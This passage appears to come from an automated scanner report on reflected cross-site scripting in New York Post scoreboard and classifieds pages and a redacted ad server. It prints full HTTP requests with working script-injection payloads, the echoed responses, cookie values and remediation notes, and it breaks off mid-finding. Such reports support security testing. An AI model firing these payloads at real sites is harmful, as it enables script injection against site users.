GET /cfb/scoreboards.asp?8145e"><script>alert(1)</script>2082e2a3405=1 HTTP/1.1 Host: stats.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Cache-Control: private, max-age=9 Date: Fri, 26 Nov 2010 20:24:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 64091
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>S ...[SNIP]... <META HTTP-EQUIV="Refresh" CONTENT="60;URL=/cfb/scoreboard.asp?8145e"><script>alert(1)</script>2082e2a3405=1"> ...[SNIP]...
1.119. http://stats.nypost.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://stats.nypost.com
Path:
/fb/scoreboard.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75afa"><script>alert(1)</script>d0a3c5ea0b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fb/scoreboard.asp?75afa"><script>alert(1)</script>d0a3c5ea0b9=1 HTTP/1.1 Host: stats.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Cache-Control: private, max-age=10 Date: Fri, 26 Nov 2010 20:23:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 58156
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>S ...[SNIP]... <META content="60;/fb/scoreboard.asp?75afa"><script>alert(1)</script>d0a3c5ea0b9=1&meta=true" http-equiv="Refresh"> ...[SNIP]...
1.120. http://stats.nypost.com/mlb/scoreboard.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://stats.nypost.com
Path:
/mlb/scoreboard.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f5ab"><script>alert(1)</script>526647f750e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mlb/scoreboard.asp?3f5ab"><script>alert(1)</script>526647f750e=1 HTTP/1.1 Host: stats.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/7.0 IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Cache-Control: private, max-age=10 Date: Fri, 26 Nov 2010 20:23:54 GMT Content-Length: 30704 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>S ...[SNIP]... <META content="60;/mlb/scoreboard.asp?3f5ab"><script>alert(1)</script>526647f750e=1&meta=true" http-equiv="Refresh"> ...[SNIP]...
1.121. http://stats.nypost.com/nba/scoreboard.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://stats.nypost.com
Path:
/nba/scoreboard.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 553e8"><script>alert(1)</script>c2e5b656e86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nba/scoreboard.asp?553e8"><script>alert(1)</script>c2e5b656e86=1 HTTP/1.1 Host: stats.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Content-Type: text/html Cache-Control: private, max-age=10 Date: Fri, 26 Nov 2010 20:23:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55508
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>S ...[SNIP]... <META content="60;/nba/scoreboard.asp?553e8"><script>alert(1)</script>c2e5b656e86=1&meta=true" http-equiv="Refresh"> ...[SNIP]...
1.122. http://stats.nypost.com/nhl/scoreboard.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://stats.nypost.com
Path:
/nhl/scoreboard.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bfd5"><script>alert(1)</script>3783214829f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nhl/scoreboard.asp?3bfd5"><script>alert(1)</script>3783214829f=1 HTTP/1.1 Host: stats.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/7.0 IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Cache-Control: private, max-age=10 Date: Fri, 26 Nov 2010 20:23:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51845
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>S ...[SNIP]... <META content="60;/nhl/scoreboard.asp?3bfd5"><script>alert(1)</script>3783214829f=1&meta=true" http-equiv="Refresh"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fe6c"-alert(1)-"e45e0a85c9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /seller9fe6c"-alert(1)-"e45e0a85c9d/1357873/ HTTP/1.1 Host: usa.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:27 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=e17d46f4cace52de2f1a7a154b5c560b; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=17b1569672d8377c490c56bedaae484b; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1ENUM3OTU0NjRDRjAxNzdC; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA2Nzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90a8a"><script>alert(1)</script>0bc6ba7292 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /seller90a8a"><script>alert(1)</script>0bc6ba7292/1357873/ HTTP/1.1 Host: usa.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:26 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=6314450fea101b2308e655bdcc8c4b38; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=ec0c13ddb0a6e63abdaf0ce42fe905ac; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1COUFFRTIwMDRDRjAxNzdB; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA2Njt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eae4f"-alert(1)-"6ea7d1d3e5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /seller/1357873eae4f"-alert(1)-"6ea7d1d3e5a/ HTTP/1.1 Host: usa.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:24:32 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=698ca94c019131a34e7cc89d01cedc8e; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=24780bb1a0dc2a3d57753a934237e825; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1FNEU4RkJGQTRDRjAxNzgw; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA3Mjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14145
1.126. http://usa.classifieds.nypost.com/seller/1357873/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.classifieds.nypost.com
Path:
/seller/1357873/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78a75"-alert(1)-"24fbe44fe7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /seller/1357873/?78a75"-alert(1)-"24fbe44fe7d=1 HTTP/1.1 Host: usa.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:24:24 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=2b2a1e79ed0636d22bed1acb464ba6e8; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=ff824e33ae4b4bf1d16c43bab1fafcdd; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1FNEQ3Qzk5QzRDRjAxNzc4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA2NDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14162
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c209'%3bd57c61ac63f was submitted in the REST URL parameter 4. This input was echoed as 4c209';d57c61ac63f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8GF/iview/273499083/direct4c209'%3bd57c61ac63f/01/4055590?click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 10027 Content-Type: text/html Expires: 0 Connection: close Date: Fri, 26 Nov 2010 20:21:41 GMT
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2656d</script><script>alert(1)</script>23fe364328 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f2656d</script><script>alert(1)</script>23fe364328 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 10109 Content-Type: text/html Expires: 0 Connection: close Date: Fri, 26 Nov 2010 20:21:36 GMT
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ed69'-alert(1)-'620381f48c5 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f8ed69'-alert(1)-'620381f48c5 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 10018 Content-Type: text/html Expires: 0 Connection: close Date: Fri, 26 Nov 2010 20:21:36 GMT
1.130. http://redcated/8GF/iview/273499083/direct/01/4055590 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/8GF/iview/273499083/direct/01/4055590
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a13fa'-alert(1)-'d10f1ed129e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8GF/iview/273499083/direct/01/4055590?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/k%3B232868202%3B0-0%3B0%3B52073520%3B3454-728/90%3B39255443/39273230/1%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-81927268_1290802684%2C11bbcecf1d09b9d%2Cbiz%2Cam.b-am.a-am.h-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D886661%3Bcontx%3Dbiz%3Bdc%3Dd%3Bbtg%3Dam.b%3Bbtg%3Dam.a%3Bbtg%3Dam.h%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.pb8k%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.none_h%3B%7Eaopt%3D3/1/ee55/0%3B%7Esscs%3D%3f&a13fa'-alert(1)-'d10f1ed129e=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805824155&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpromotions%2F&refer= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 10016 Content-Type: text/html Expires: 0 Connection: close Date: Fri, 26 Nov 2010 20:21:38 GMT
1.131. http://redcated/8GF/iview/273499083/direct/01/4055590 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/8GF/iview/273499083/direct/01/4055590
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97117"><script>alert(1)</script>624b718fa81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
